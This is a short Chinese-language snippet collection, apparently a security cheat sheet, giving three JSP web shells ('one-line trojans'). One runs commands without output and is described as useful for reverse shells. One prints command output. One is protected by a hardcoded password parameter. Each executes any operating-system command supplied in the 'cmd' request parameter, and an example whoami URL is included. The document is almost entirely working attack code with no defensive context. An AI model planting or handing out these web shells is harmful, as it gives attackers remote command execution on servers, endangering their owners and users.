一、无回显一句话木马
http://localhost/index.jsp?cmd=whoami
不会回显执行的结果只能在后台打印一个地址,常用来反弹shell
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
<title>一句话木马</title>
</head>
<body>
<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
System.out.println(process);
%>
</body>
</html>
二、有回显一句话木马
<%@ page import="java.io.InputStream" %> <%@ page import="java.io.BufferedReader" %> <%@ page import="java.io.InputStreamReader" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> <html> <head> <title>一句话木马</title> </head> <body> <% Process process = Runtime.getRuntime().exec(request.getParameter("cmd")); InputStream inputStream = process.getInputStream(); BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = bufferedReader.readLine())!=null){ response.getWriter().print(line); } %> </body> </html>
三、有密码的回显一句话木马
<%@ page import="java.io.InputStream" %> <%@ page import="java.io.BufferedReader" %> <%@ page import="java.io.InputStreamReader" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> <html> <head> <title>一句话木马</title> </head> <body> <% if ("password".equals(request.getParameter("p"))){ Process process = Runtime.getRuntime().exec(request.getParameter("cmd")); InputStream inputStream = process.getInputStream(); BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = bufferedReader.readLine())!=null){ response.getWriter().print(line); } } %> </body> </html>